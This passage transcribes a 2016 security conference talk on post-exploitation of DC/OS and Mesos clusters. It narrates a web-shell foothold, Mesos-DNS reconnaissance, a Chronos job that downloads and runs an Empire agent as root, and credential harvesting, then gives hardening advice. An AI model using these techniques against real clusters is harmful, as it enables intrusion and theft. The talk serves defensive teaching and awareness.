
One Compromise to Rule Them All

BSides Las Vegas 2016 · 53:00 · 309 views · Published 2016-08
About this talk
Bryce Kunz and Scott demonstrate how to exploit a compromised DC/OS (Datacenter Operating System) and Mesos cluster. Starting from initial access to a container, the speakers show reconnaissance techniques using DNS enumeration and API calls to map cluster topology, then escalate privileges across the cluster via job-scheduling frameworks like Chronos and Marathon to achieve root-level code execution on cluster agents.
Original YouTube description
One Compromise to Rule Them All - Bryce Kunz Breaking Ground BSidesLV 2016 - Tuscany Hotel - Aug 03, 2016
Transcript [en]

We have Bryce and Scott; they're going to be presenting One Compromise to Rule Them All. It's going to be a little bit of an addition to the previous presentation on Empire, so with that, I'll leave it to Bryce and Scott. — Can you guys hear that okay? Great. Scott's going to show you today a little bit about DC/OS and Mesos and why you might want to check out these technologies for doing job orchestration across your data centers, and then I'm going to show you why you should take just a little bit of extra time to try and secure some of the building blocks that DC/OS is built upon. So I'll hand it over to Scott to get you up to speed.

Is anybody in the room familiar with DC/OS or Mesos? Are you using that in your day job, or for fun? We've got a couple of people. So DC/OS stands for Datacenter Operating System. It was born out of a need to efficiently use resources in your data center. A lot of organizations find that, just running jobs on their servers, they're seeing about sixty to sixty-five percent utilization of the hardware they have in their data centers — meaning they have millions, tens of millions, lots of dollars' worth of hardware that's just sitting in their rooms, that they're paying for, that's not really giving them any use. So DC/OS was born to kind of

solve some of this problem. The philosophy behind DC/OS is: you treat all the resources, all the hardware in your data center, as a single box. You bubble all those resources up into one place where you can then send jobs to different places, to make sure you're running your hardware as efficiently as you can. So at the bottom of this cluster you need something that can run it, like an operating system, which has a kernel — Mesos is kind of the kernel layer of this DC/OS. There are two pieces of Mesos: there's the cluster, which is a set of masters that receives offers from agents, or slaves. The agents, or slaves, you install on hardware or VMs or cloud

instances, and they make resource offers up to Mesos — so that's this bottom tier. On top of Mesos you have a set of frameworks; those frameworks handle job definitions. So if you have, say, a set of Apache servers you want running, if you have batch jobs, if you have scheduled jobs, there are different frameworks that will handle those different types of jobs. On top of that is where you deploy your applications. Usually these are multi-tenant clusters — they can be multi-tenant clusters — meaning you'll have different types of jobs running for different teams, probably not different companies, but more than likely different types of jobs running on here. These are usually packaged up in containers, and there's a handful of different container technologies,

but typically Docker. So you write your job in Docker, you orchestrate it using a framework, and then Mesos takes those job definitions and finds places for them to run. A little bit more about the communications between these: the agents are running on this hardware at the bottom — or VMs, or whatever — and they communicate with Mesos using a configuration share called ZooKeeper. The easiest way to think about ZooKeeper is basically a network-accessible JSON object, a key store: I store this value here, I retrieve this value somewhere else. So the slaves will say, "I have hardware, I'm offering it" — they'll put an entry in this key store — and Mesos will pick that

up, match your job with it, put it back in, and the slave will pick it back up and start executing that job. Between the kernel and the frameworks — that kind of top purpley layer — communications are typically done either via ZooKeeper again, or via REST APIs that are built into Mesos. Of the common frameworks, Marathon is probably the most common one; pretty much any deployment of Mesos you'll see will also have Marathon living next to it. Marathon is for long-running jobs. It's also used for scaling jobs: if I have one Docker container, I create a job definition, put that in Marathon, and then you can say, oh, I want ten of these running, or fifty of these

running. You can drive it using the API too — collect metrics from the boxes and, say, as performance hits eighty percent utilization, increase the instances in this pool. Chronos is basically a cron for DC/OS: you can give it a job definition — which can be something as simple as a normal bash command — give it a time frame and a frequency to execute on, and whenever that time frame hits, it'll run it. So you can see a lot of the correlations between DC/OS, with these services and frameworks, and a normal operating system. So, typical use: I have my Docker container, I create a job in Marathon, Mesos finds a

host to run it on, sends the command to the agent, the agent pulls down the Docker container and runs it with whatever environment variables or arguments need to be passed into it — and yeah, that's kind of the typical use. Oh — a quick demo. So this is what DC/OS looks like as a UI. It shows what your utilization is across the hosts — obviously we're not using our stuff very efficiently right now. You can see what services have been spun up in DC/OS. Chronos and Marathon are frameworks, but they can also be run inside of Mesos, so there's a little bit of inception going on here, with the Chronos and Marathon services running inside of

Mesos as well as communicating with Mesos. If we wanted to set up a scheduled job, we would jump into Chronos — come on, Chronos — and you could create a job here. It's been a little sluggish — come on, Chronos — we didn't do sufficient sacrifices to our demo gods. Effectively, here, you give it a command, you give it a time frame, and whenever that time frame hits, that will trigger the job via Marathon.
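Under the hood, a Chronos job like the one being created here is just a small JSON document handed to the scheduler. A minimal sketch in Python — the name, owner, and command are made-up illustrative values, and the schedule string is an ISO 8601 repeating interval (repetitions / start time / period), a format Scott comes back to later in the talk:

```python
import json

# A minimal Chronos-style job definition. Field names follow the Chronos
# scheduler API; the values are illustrative only.
job = {
    "name": "scheduled-job-001",                  # hypothetical job name
    "owner": "ops@example.com",                   # hypothetical owner email
    "command": "echo hello from chronos",         # shell command the agent runs
    "schedule": "R/2016-08-03T00:00:00Z/PT24H",   # repeat / start / 24h period
    "epsilon": "PT30M",                           # how late the job may start
}

payload = json.dumps(job)
print(payload)
```

This is the payload shape the demo's "create a job" form ultimately produces; the UI is just filling in these fields for you.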

Sorry, we're having VPN problems — now we're dead.

All right. Yeah — in Marathon you'd be able to see the jobs that are already defined, how many instances they're running, and you'd also be given the option to scale them up or down. So it's really well built for scaling and high availability of your applications running in here. Obviously this is a pretty small cluster and conference Wi-Fi isn't awesome, but yeah, we'll move forward — I'll hand it back over. Okay, good — thanks, Scott. Okay, so how many of you have seen Lord of the Rings? Yeah, okay. So I know we just went over a lot of stuff, right, and for the most part people haven't heard of these technologies before. But these technologies are being moved towards

high utilization inside of companies that you guys are probably acquainted with. For example, if you go to the Mesos website you'll see a list of over 100 companies — some of those are like Airbnb and things like that — that are using the cluster to automatically speed up processing and do CPU-intensive tasks at scale. So, all right, now we're going to talk about initial access inside the cluster. This talk is more of a post-exploitation talk, and we're going to show you some brand-new Empire modules that are going to enable you to talk to these various building blocks, or services, inside of the DC/OS cluster. So that's kind

of the crux of what we're getting to. But before we do that, we've got to get initial access into the cluster, right? So how many of you have ever hacked a website before — raise your hands. Yeah — so, you know, there you go, right? So, go over here on the VPN — okay, great — and come over here. So I have this container; it's running inside of our DC/OS cluster, and it's publicly accessible on the internet. It just has a vulnerable PHP application. This isn't anything crazy, but if you see here, I just wrote really quickly this eval in PHP — you just pass an eval parameter,

and that parameter just gets eval'd, right? So you get system on it. So, you know, that's really trivial — that's not anything mind-blowing — because what we're trying to do is show what happens once you get remote code execution inside a web app, inside of that cluster container. So coming over to here: I'm going to SSH out to my box and pray to the demo gods that this is going to work. All right, I'm gonna drop from VPN, see if it works... okay, we're on the box. Sweet. Is that text clear, big enough for you guys, or do you want it bigger? Bigger? All right, bigger it is — I give the people

what they want. All right, is that good? Okay, sweet. Okay, we're up on our box. We're a hacker, right? We've used this eval shell to drop a Weevely shell on the box. Weevely is like C99 — a public PHP web shell that I frequently use when I'm pentesting websites. How many of you — raise your hands — have heard of Weevely before? Okay, quite a few, cool. So it's kind of modular, like Metasploit: you can write additional code and it will actually eval it, using a PHP eval on the server side, and kind of keep it more in memory — so if someone does on-disk file analysis, they'll just find the highly randomized Weevely loader on the

remote side. So if you haven't used Weevely before for web shells, you should definitely check it out — although that's not what this talk is about. So, I've got a bunch of screen sessions running on this, and I've got one set up for Weevely. With Weevely, you run the Python script — which is the operator side of Weevely — then you give it the web address, so you can see here, this is our website, and you need a password to interact with it. I'm going to tear this off the internet, hopefully, after the demo so you guys can't hack my box — but please don't screw up my demos in the meantime.

All right, so when you drop into a Weevely shell you just get this prompt. If you execute a regular command, you can execute commands just like you were on the box. If you want to execute a Weevely-specific module, you can just do a colon and then the module name — or if you're confused, ":help" will list out all the modules. We're just going to use this to get interactive. Sweet — so we've got kind of a web shell on the remote target, inside this container, inside the DC/OS cluster. What we really want is a full interactive remote-access tool running in that environment, right, so we

can, you know, pivot through the network, redirect things, stuff like that. So how many of you — raise your hands — have used Empire before, any version of Empire? Okay, a couple. What about Meterpreter — you guys use Meterpreter? Yeah, a lot of you, okay, great. So it's just a post-exploitation RAT that allows you to interact with the system. There are two versions of Empire: there's the PowerShell version, which is for Windows, and then there's the Python version, which is more focused on OS X — recent code changes have also enabled it on a set of Unix and BSD targets, back-porting support for older Python versions. It's all

written in Python. So we want to get Empire running on this box, right? One catch: people are obsessed with making their containers as small as possible. They want the least amount of dependencies in the container, because they want them to be able to scale easily and not take up too many resources. So what does that mean for us as attackers? We don't have as many options for post-exploitation as we might on a normal Linux box. So let's say we're on this box and we really want to get Empire up and running on it. Normally, if Python were there, we'd

just be able to execute Empire and be good — but if we do "which python" on the box, it doesn't return anything, because Python's not installed inside the container. So — Docker — how many of you guys have used Docker before? Hands? Yeah, some of you. Docker has a public repo, and I pulled down the top five containers in the Docker repo — the top five containers people have downloaded. Of the top five, only one had Python installed on it by default. So as a person who's trying to hack into DC/OS clusters, this poses a problem for me. So I built a stager — a new stager for Empire — and for all the new

stuff, I'm going to push a pull request tonight. So if you guys check back tonight, you'll see it's there — well, at least in the pull request, until the maintainers accept it. So, all right, cool. Oh yeah — we've actually got to show you the solution. The solution I came up with — it's not the perfect solution, but it works — is I built an Empire stager that will actually build an ELF binary using PyInstaller. It's going to generate your stager inside Empire, then it's going to reach out to PyInstaller, figure out what dependencies it needs, and then compile that all

into an ELF binary that you can remotely drop on the target. For those of you who don't know, ELF binaries are like EXEs for Linux systems. So, all right, here we go — let's go over to Empire and interact. All right, have I lost anybody? Maybe — but if you guys have questions, feel free. All right, I get thumbs up, so I'm just gonna keep going. So I'm going to show you guys how to use Empire as part of this — I'm sure the guys before did a much better job, but I'll show you my way. You just ./empire, and then you need to establish a

listener first. So there's a port that we're going to bind to on the attacker side, and this is what our Empire RAT is going to be calling back to, and what we're going to use to interact with the remote container. So right here — if you copy what I'm doing in this presentation on a real pentest, you're gonna have really bad OPSEC and probably get caught, so you might want to up your game a little bit — but I've just established the default, which is going to listen on port 8080. So when we execute the Empire RAT, it's going to connect back to this server on 8080, and then we're going to be able to issue commands and all that.

And I just named the listener "test", because we're trying to get stuff done. So then we do "usestager" and then just "pyinstaller". This is the new thing, right — but it works exactly like the other stagers: you do "usestager pyinstaller" and it shows you all the options you need to set. The only one we really care about right now is telling it which listener to call back to. We only have one listener — the test one — and that's bound to port 8080 TCP. So "set Listener test", right, and then do "info", and then the only other

thing you want to note here is that it's going to build the ELF binary, chuck it in /tmp, and call it "empire" — not too stealthy, but nonetheless it's going to work. So, okay, here you go. What it does is scan through a couple of Python files, figure out what dependencies you need, grab those together into this Python file right here, and then reach out to PyInstaller and automatically use it to create the ELF binary. So the ELF binary is now made, and if we go into /tmp we can see there's now a binary there, and if we "file" it we can see it is in

fact an ELF 64-bit binary. If you want to do something crazy — you're like, "I really like where you're going, but I want to put some crazy code in and then have it compile it" — just for convenience, I left the source file there, and I left the spec file, which is what PyInstaller uses to compile and make the ELF. So you can do some easy customization there, and kind of use this to jump-start. Okay — and then, just because I'm trying to demo things to you guys today, we're just going to move these binaries onto the target by basically doing a PHP version of wget. So I started up just kind

of an ad hoc web server on this box — you can see the ad hoc web server running here. Just in case you don't know this trick, it's a really cool one: if you've got Python and you need a really quick HTTP web server, just do "python -m" and the SimpleHTTPServer module, and it will actually establish a web server on the box and dish out any files that are in that directory. So here we're going to dish out files that are in /tmp — it's just kind of convenient. Okay, yeah, let's push on. Okay, here you go — so that's just a trick, because I do not like setting up

Apache web servers just to pull down one file, right. So — oh, shouldn't quit that, wrong thing — all right, we're good. All right, I just said a lot of words, so hopefully you guys are still tracking with me here. I swear, once we get into the network it's going to be like butter, okay — I know it's a lot of setup. All right, we're back in Weevely now. So we've got to wget the binary — Weevely makes this super easy; it actually just has a function for it, and I'm going to find it. Oh — let's make sure it's not there from a previous demo. Nope, we're good — nothing's

in /tmp on the remote target. Now we're going to use this Weevely module to basically wget the file using PHP — yeah, Weevely makes our life easy. So we just wait a second because it's downloading the file... the file's now there. We can even run a command in Weevely, and now we can see the file on the remote target. So we just need to make sure we chmod it, to make sure it's executable on the remote target — this is a Linux box — and then we're just going to kick it off using just a straight command. So the Weevely PHP shell is going to kick

off Empire — the binary we pulled down, using Weevely, from the simple Python server. Okay, all right, here we go. Now, in an ideal scenario, if we come back around to Empire we'll see the glorious text we've all been waiting for, which is "initial agent from this IP is now active", right? This means we've got a new agent inside the target network. So if you type "agents" we can see all the agents — there's only one here — and then we just type "interact" and the name of the agent. One thing that is really helpful inside of Empire is "rename" — we can rename an agent to whatever we want, so I'm just going

to rename this to, like, "webapp" or something, so we can remember where we are in the network — because we're not going to stop at one agent, right? We're going to go through and tear this network up. All right — and I've got to get back to the slides, because we're missing out on some killer memes. So, of the top five containers I analyzed, only one had Python, and that's the registry one; the other four did not have Python. So if we use the PyInstaller trick, we can get around that. Yeah — pack it up boys, we're going on a pony trip. So this is

pretty much us now: we are that hacker dude — that's Scott, master hacker, throwing lightning bolts — and we've got that little icon with the Python, like the little Empire logo; I don't know, maybe you guys got some of the stickers from before. So we've got that running inside a container, inside the DC/OS cluster. So the first thing we've got to do, when we get inside a DC/OS or Mesos cluster, is orientate ourselves by doing a little bit of recon against some of the systems that hold information about where services are available in the cluster. One of the tenets of the cluster is that a slave can die and new slaves can come up, and the

cluster will make sure, say, there are always three of this container running, or always a hundred of this container running, and it will realize when those die that it needs to spin more up — and you also do things like traffic redirection through HA boxes and all kinds of other stuff. So, all right, I'm going to show you now how to extract information from the Mesos-DNS service. Mesos-DNS provides two avenues for containers or services or apps to get information out of it. It provides a traditional DNS service — I'm not really going to talk about that today; any of your traditional DNS reconnaissance techniques will work against it. What I'm going to show you

is that they have a newer API that they built out, which I feel like a lot of developers are going to use to try and orientate themselves inside the DC/OS cluster. So I'm going to show you how to extract information out of that — and we need that information to exploit more stuff. "Could I make an interjection?" "Yeah, go ahead." So the DNS — both the service and the API — is pretty important to the whole ecosystem of Mesos, based on the concept that basically any service could end up popping up on any agent. So in order to figure out what resources you're talking to, you can't do that by IP — you have to do it by DNS

record. So this isn't really something that could easily be stripped out of Mesos, because the frameworks themselves need it to know what endpoints to talk to — both IP and port, because either one of those could be random... well, is random, in most cases. "Okay, great — thanks, Scott." So, interacting with the web-app Empire agent: I wrote this module for Empire. It's really nothing more than letting you do DNS lookups inside the network — I just wanted to show you something about the DC/OS cluster so you understand the easiest way to orientate yourself once you get initial access. So there's a

TLD called .mesos, and most of the services will have a name under it. So master.mesos, once you're inside the network, will resolve to the master; marathon.mesos will resolve to the Marathon box; chronos.mesos will resolve to the Chronos box. And you can also see which things are co-hosted, because they'll give you back the same IP. So we just set master.mesos and then execute, and it shows us: hey, it's on this 10-dot address inside the internal network. So it's doing a DNS lookup. Let's go into something a little bit more — I mean, that's really simple, right, you could do

that using ping or anything on a box. I want to show you another module that I wrote — the Mesos-DNS API "enumerate" module. Looking through the source code, I found an API function called enumerate; it is basically the equivalent of a zone transfer, so it will dump all of the data about everything in the cluster that Mesos-DNS knows. I don't think this is undocumented — but it's also not in the documentation. The developers do talk about it, like, in GitHub issues, so I think the documentation has just not been

updated yet — but, I mean, you can have your own opinion on that. So, Mesos-DNS listens on TCP port 8123, and we can determine where that is because it's usually co-hosted on the master. This module will just make a web request out to it, call the HTTP API, and collect the JSON — it returns the results in JSON format — and then Empire is just going to record those down to disk. You can see this worked; it recorded it to disk right here, and I'm just going to show you what it looks like — a couple of modules kind of do the same thing,

but I just want you to be able to visualize what this looks like from an attacker's perspective.

Okay, so it just returns this JSON blob, and the first thing it's going to tell us is the frameworks that are in the cluster. Then it's going to say: hey, inside this framework there are tasks, and inside here there's this proxy, and this proxy is on this slave — this physical hardware box — and that's its IP in the cluster. And the most important thing this is going to give us is the IP plus the random high port. One of the things you'll find with DC/OS and Mesos is that services are going up and down, and every time they do, on a slave, the service is

not going to bind to a normal port. So even though this is probably a proxy for Apache or another web service, it's going to bind to these random high ports. Querying the DNS service and figuring out what those are is going to enable us to further exploit additional services. And what we really want out of this is Chronos — because Chronos is kind of like crontab for the DC/OS data center, so if we can interact with Chronos, we can schedule malicious tasks and execute them. And here we see that Chronos is on .160, and — the most important thing — Chronos's random high port is 61232. So you

could, I guess, scan the whole cluster to figure this stuff out, but it's just easier to ask, right? All right, sweet. So we know where Chronos is in the cluster now, so now we can do a little bit more pwnage.
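The blob walked through above can be mined programmatically rather than read by eye. A sketch, assuming a response shaped like the one in the demo — the sample data below is made up (the field names and nesting mirror what's described, but real Mesos-DNS enumerate output carries more fields, so treat this as illustrative):

```python
import json

# Hypothetical, trimmed-down response shaped like the Mesos-DNS
# enumerate output described in the talk: frameworks -> tasks,
# each task with a host, IP, and random high port.
sample = json.loads("""
{
  "frameworks": [
    {"name": "marathon",
     "tasks": [
       {"name": "chronos", "host": "slave2", "ip": "10.0.0.160", "ports": ["61232"]},
       {"name": "proxy",   "host": "slave1", "ip": "10.0.0.150", "ports": ["31005"]}
     ]}
  ]
}
""")

# Walk frameworks -> tasks and map each service name to (ip, high port).
services = {}
for fw in sample["frameworks"]:
    for task in fw["tasks"]:
        services[task["name"]] = (task["ip"], int(task["ports"][0]))

print(services["chronos"])  # where to aim the Chronos modules next
```

That one lookup replaces scanning the whole cluster for random high ports, which is exactly the point the speaker is making.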

What am I at — 35? Oh, okay, cool.

So — when you set up your cluster inside your data center, do most people use that TLD? The question is: do most people use the .mesos domain name? And the answer is yes; a lot of people are hard-baking that into their infrastructure. One, it's used by a lot of the frameworks by default, and two, you have to have some way to discover where the services are so they can interact with each other. The real problem here is that there's really no RBAC, right? Like, why does a web app need to be able to ask where the Chronos cluster is? It doesn't, right — but it can get everything.

Which I think they're working on, but it's kind of a work in progress. So, okay, cool. We can also interact with the master via its API, and the one thing that gives us is a complete list of all the slaves — all the IP addresses in the cluster that could be slaves we want to get on, but that just don't have any Docker containers on them currently. We'd kind of miss those if we only went after the DNS service. I'm just going to skip over that, because it's the exact same thing —

it's another module, really simple, and it returns back a JSON blob. Good recon, for sure. Okay, all right — so we've got our Empire agent, and we've got Chronos running in a container inside the cluster, and we now know where that is from our reconnaissance modules. So now we're going to interact with it to get additional Empires inside. All right — so I got really excited, because I was like, great, we're not going to run inside a container anymore; we're going to use Chronos to pop out and run as root on these hosts, so we should be able to natively use Empire without having to compile the ELF binary. That premise did not work out:

CoreOS is kind of another stripped-down OS, designed for running containers, and the version of Python installed on it by default does not have urllib2, which is a requirement right now for running Empire natively. So it's not a big deal — we just use the ELF binary again — but I was a little bit disappointed. So, all right, come around to here.
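The dependency-resolution step the PyInstaller stager performs — "scan through a couple of Python files, figure out what dependencies you need" — can be sketched with the standard-library modulefinder, which walks a script's import graph the same way a bundler does before packing everything into one self-contained binary. This is an illustration of the idea, not the actual stager code:

```python
import os
import tempfile
from modulefinder import ModuleFinder

# Write a tiny stand-in "stager" script whose imports we want to resolve.
src = "import os\nimport json\nprint(json.dumps({'pid': os.getpid()}))\n"
path = os.path.join(tempfile.mkdtemp(), "stager.py")
with open(path, "w") as f:
    f.write(src)

# ModuleFinder walks the import graph, much like PyInstaller does
# before bundling the interpreter and all dependencies into one ELF.
finder = ModuleFinder()
finder.run_script(path)
deps = sorted(finder.modules)

print("os" in deps and "json" in deps)
```

This is also why the urllib2 problem above matters: if the target's Python lacks a module your payload imports, bundling it into the binary sidesteps the whole question.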

All right, so we can do the recon. The only thing about the recon you really want to take note of, against the Mesos master, is that it listens on TCP port 5050 — and for the most part people aren't going to change that, because all the slaves, or agents, have to talk back to it. Okay, so here we go — this is where it starts to get a little more fun. I wrote this module called Chronos API "list jobs", and what it's going to do — inside of Chronos, which is here, we can visualize the list of the jobs, right? So this is going to interact with the API,

pull back a JSON blob that's going to have this "do the thing" Chronos job in there — and all that job is really doing inside of our cluster right now is saying, hey, execute the sleep command on the box; it's kind of just a demo thing. What I like to do is: list all the jobs in the Chronos framework, then add a job that looks really similar to the other jobs, to blend in; then execute that job; and then delete that job — so I'm clean, because I don't want someone to come in and find my malicious job. So we get a listing just by interacting with the

chronos.mesos TLD; we just execute on that, and it saves back a list of all the jobs to this JSON blob — it looks pretty much identical to the last two JSON blobs I showed you, so I'm not going to pull that up. And now that we know what the jobs are, let's go add a job. So, Chronos API "add job", and we do "info". Okay, a couple of things we need here: one, where's Chronos in the network — we can pretty much use the TLD trick for that. Two, these parameters right here — we mostly just want to blend in with what we listed out. Like, we probably

don't want to make up an owner that doesn't exist — somebody might get suspicious about that, if they have logging enabled. And the name and description of the job — when you click on a job in the GUI you can see the descriptions right here, so you want to blend those in too. So I just called mine "scheduled job 001", description "scheduled job 001". And the main thing we want to change here is the port, right — Mesos is going to automatically deploy the container inside the DC/OS cluster, so remember, we had to use the DNS recon

to figure out what port it was — so, if you guys remember, I think it was 61232. Okay, great. And then, by default, this is just executing the "id" command — we want to do something a little more malicious than that. So we go over here and we're just going to execute this one-liner, which sets the command to curl the Empire binary that's available via our Python SimpleHTTPServer, chmod it to make it executable, and then execute it. And, if you notice, we're not really specifying which slave or agent to execute this on — the framework is going to figure

out what has resources and just randomly deploy it there. I'm working on a newer version of the module right now that will actually let you set that parameter, because I found a way to do it — but that'll take, like, a week or two before I get it out. So we just set that, and then you can type "info" and see our malicious command is set up there — looking good — and then we type "execute". So with Chronos it's kind of a two-step thing: we add the job, and then it wants something like a cron schedule. So we could set the schedule, if we

know the remote target's time — or assume the remote target's time is similar to our own — so that it would execute in, like, five minutes or something. I don't know if you guys remember scheduling "at" jobs on Windows domains, classic stuff like that — we could do the same thing here. But there's actually an API call that just says "execute now", so I wrote another module for that. Hopefully this one comes back... it worked — oh, come on buddy, don't do that, go back... let's not screw something up... it's hard to tell at this resolution; I'll make it big again in a second... Try a different job name? Oh, you think the

job — okay, let's just go check agents. Oh no — okay, all right — oh, that's right, we didn't set it to run yet. Yeah... but that sleep... So let me jump in really quickly: in the Chronos job definitions, it's not a normal cron schedule — it's not like "* 1 * * *" or whatever. You specify a start time and a period. So if you say, go with, like, a 24-hour period, but start some time in the past, it'll fire immediately, and then it will fire 24 hours later. So it's not a normal cron schedule — it's a start time and a period, which is a little bit different.
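Scott's point can be made concrete: Chronos schedules are ISO 8601 repeating intervals, "R[n]/start/period", so any start time in the past means "fire now", then repeat each period. A simplified sketch of that logic — the parsing below assumes UTC "...Z" timestamps and hour-based "PT..H" periods, which is narrower than what Chronos actually accepts:

```python
from datetime import datetime, timedelta

def is_due(schedule, now):
    """Very simplified Chronos-style check for an R/<start>/PT<h>H schedule."""
    _, start_s, period_s = schedule.split("/")
    start = datetime.strptime(start_s, "%Y-%m-%dT%H:%M:%SZ")
    period = timedelta(hours=int(period_s[2:-1]))
    # A start in the past fires immediately; the next run is one period later.
    return now >= start, start + period

now = datetime(2016, 8, 3, 12, 0, 0)
due, next_run = is_due("R/2016-08-03T00:00:00Z/PT24H", now)
print(due, next_run)  # True 2016-08-04 00:00:00
```

This is why the demo job didn't fire: its start time hadn't been reached yet, which is what the "execute now" API call works around.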

All right, that's okay. It should show up here if it was working... we're having a hard time. Okay, just one minute; jump back into Empire. All right, you can still see it's executing. Interact again with this session, kick off another one. Thanks.

Go back around to Empire: agents, interact... okay, go here. This module uses the simple Python server we have running... well, it shouldn't actually matter for this, right? But yeah, we should check that; set the port.

Okay, and then do execute against the remote target network. Okay, there we go. All right, so hopefully it shows up now. I don't know why that Empire agent died. Okay, there we go: here's our job, AAA. You can see it's malicious, and you can also see the last time it ran was "never," so we haven't started it yet. If we actually set the timing correctly on it, we could get it to schedule out five minutes from now, but it's just easier, in my opinion, to use this other API call; hopefully I'll be able to consolidate these all into one module in the future. Then execute... okay, come on, buddy. Oh, the name is wrong. So we change it, set the Name to AAA, and then execute.

Okay, great. You should see over here in a second: it's going to refresh, and then it's going to say "running." So we've got "running" now, and that's great, because hopefully it pulled back down our Empire payload and we've got a new Empire agent inside the system. So we go to agents and we can interact with the new one. A cool part about Empire is you can see who you're running as over here: we're running as apache on the first two, and on this new one we're running as root. We can double-check that by doing a "shell id" and execute, and you

can see it comes back with the id output: root. Thanks. It was a long road, but we scheduled a job and it executed. That's basically the diagram we had: we popped a web server to get the agent, we talked to the Chronos framework after doing recon to figure out where it was, and now we've got Empire running as root inside the cluster. You could just repeat that until you get code execution as root on every single slave (agent) inside the cluster, or use the new technique I'm working on to get more targeted in the network. Cool, let me just check the time. Oh, we're pretty high on time.
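The "execute now" API call used here is, as best I can tell, Chronos's manual-start endpoint: a PUT against /scheduler/job/&lt;name&gt;, which runs an existing job on demand regardless of its schedule. A minimal sketch, assuming the default Chronos port of 4400 and a hypothetical host name:

```python
from urllib.request import Request

def force_run_request(chronos_host, job_name):
    """Build the 'run it now' request described in the demo.

    In the Chronos REST API of this era, PUT /scheduler/job/<name>
    triggers an on-demand run of an already-registered job. The host
    name below is a placeholder, not from the talk.
    """
    url = "http://{0}:4400/scheduler/job/{1}".format(chronos_host, job_name)
    return Request(url, method="PUT")

req = force_run_request("chronos.mesos", "AAA")
print(req.get_method(), req.full_url)
# urllib.request.urlopen(req) would actually fire it; left out of this sketch.
```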

So I'm not going to do this one, but we figured out how to do the same thing by interacting directly with Marathon instead of Chronos. I've never seen anyone run a Mesos cluster without Marathon; you could technically not have Chronos in there, but you pretty much need Marathon. So if you can talk to Marathon, you can do the same thing; it's the same process. (You need Marathon, right? Yeah, pretty jazzed about it.) All right, so that was that demo. I'm skipping this one, but it would get us a slave running as root, with Docker running Empire on another slave. All right.
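The Marathon variant he's describing would be the same idea against Marathon's v2 API: POST an "app" whose cmd is the stager to /v2/apps. A sketch with assumed values (the app id and stager URL are mine, not the demo's):

```python
import json

def build_marathon_app(app_id, stager_host):
    """Marathon equivalent of the Chronos trick: a long-running 'app'
    whose cmd is our stager. POST this JSON to
    http://<marathon-host>:8080/v2/apps. Field names follow the
    Marathon v2 app schema; values here are illustrative only.
    """
    return {
        "id": app_id,
        "cmd": "curl -s {0}/empire.sh | sh".format(stager_host),
        "cpus": 0.1,
        "mem": 64,
        "instances": 1,
    }

app = build_marathon_app("/sys-helper", "http://10.0.0.5:8000")
print(json.dumps(app))
```

One difference worth noting: Marathon treats this as a service and will restart it if it dies, which from an attacker's perspective is free persistence.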

So, all right. Once you own the cluster, you can spin up jobs; you can spin these things out. You'll notice that at no point did we do any kind of container breakout to go from having access inside one container to having agents running as root on the other agents.

So once you're there, where can you go? DCOS is highly automatable, and most of the time when people use it they're interested in tightening up their release pipeline. So with DCOS you'll often see people doing really high-speed, automated-everything releases, from a push to git

all the way to a new version of the application running in production. What that means is you'll often see these boxes in production with access back to wherever build artifacts live. That could be back to git directly; it's almost guaranteed to be back to some kind of private Docker registry. So by looking at the job definitions you'll see in Marathon and Chronos, you'll find the credentials and the locations you need to go pull more pieces of information out, which can be useful in your pen test. Most of the time, the applications running in these Docker containers aren't completely self-contained either: they'll need some kind of

persistent storage, out to a database or an object store, somewhere they can maintain state. That means the credentials the application needs have to get into the container somehow. That either happens as part of building the Docker image (Jenkins may bake them in and ship it off to the Docker registry) or they're defined in the job definition as environment variables. There are a couple of things you can do to make that a little more difficult, but eventually the application is going to need those credentials to reach remote resources. So if you have control of the cluster, you have control of all the avenues those credentials come in through.
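Pulling credentials out of job definitions, as described above, is easy to automate: walk Marathon's /v2/apps response and flag secret-looking environment variables. This is my illustration, not a module from the talk; the sample data is invented:

```python
import re

# Key names that tend to mark secrets; extend to taste.
SECRET_KEY_RE = re.compile(r"(PASS|SECRET|TOKEN|KEY|CRED)", re.I)

def harvest_env_credentials(apps_json):
    """Scan parsed Marathon /v2/apps output for credential-looking env vars.

    apps_json is the decoded response body:
    {"apps": [{"id": ..., "env": {...}}, ...]}
    Returns (app id, env name, env value) tuples.
    """
    found = []
    for app in apps_json.get("apps", []):
        for key, value in (app.get("env") or {}).items():
            if SECRET_KEY_RE.search(key):
                found.append((app.get("id"), key, value))
    return found

# Invented sample resembling a Marathon response:
sample = {"apps": [{"id": "/billing",
                    "env": {"DB_PASSWORD": "hunter2", "LOG_LEVEL": "info"}}]}
print(harvest_env_credentials(sample))
# -> [('/billing', 'DB_PASSWORD', 'hunter2')]
```

The same scan works on Chronos job listings; only the JSON shape differs (jobs carry an "environmentVariables" list rather than an "env" map).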

So: recommendations on how to trim some of this down. Some of the components in DCOS do have authentication available; most of the time it's not set up by default. A lot of the frameworks only do basic authentication, and some frameworks support zero authentication: you can't set up any authentication without breaking the whole framework. So wherever possible, enable authentication on your frameworks and on ZooKeeper; enable it on the UI, enable it on the API; lock that down as much as you can. One attack avenue we didn't really talk about is slave authentication: if you have visibility to ZooKeeper or the Mesos master, you can spin up a

malicious slave, register it, and start receiving jobs from the master. So make sure you turn on agent and framework authentication, and hope nothing breaks; definitely test it first. Next is segmentation. For the demos, Bryce compromised the container and was then able to immediately hit the Mesos control plane from there. In most situations there's no need for that to be possible. There are a handful of technologies you can use to shove a whole IP stack into the container; you override the Docker bridge with another way to access the network, or you can use a project like Calico, which puts down a BGP overlay allowing communication between containers on different hosts.

Try to do everything you can to segment IP access from the container down to only the resources it needs, and don't open up the management plane if you don't have to. Next: updates. This is pretty cutting-edge stuff; Mesos 1.0 was released like five days ago and has some security features in it that we haven't really been able to explore thoroughly yet. In the versions we evaluated, there's no role-based access control, meaning if you get into DCOS you're an admin: you can see your jobs, you can see everybody's jobs. With the new version of Mesos there's some role-based access control in there, supported at the Mesos layer itself.

The frameworks still have to catch up to that in order to really make use of it. So, a couple of companies are using Mesos; it's typically used by organizations that need to run products at scale. Shall we do the infosec feud? Yeah, okay, cool: Infosec Feud. I just wanted to see what's the most egregious thing I could find on the internet. There's really no reason for any of these services to be on the internet; they should at least be protected so that you're forced to get a foothold in the network before you can pivot to them. But I thought, let's go to a major cloud provider and see

how many people have port 8123 open, and see what I can do with just a little bit of recon, nothing too crazy. So, looking at Mesos-DNS: how many servers do you think were accessible via the internet from a quick scan of one cloud provider? I was hoping for a lot more, but I found 54 that were open on the internet, scanning just one cloud provider. And each one of those represents an entire cluster, which could be two machines or could be a thousand machines. So that's not 54 boxes; that's fifty-four clusters. And then, how many of them do you

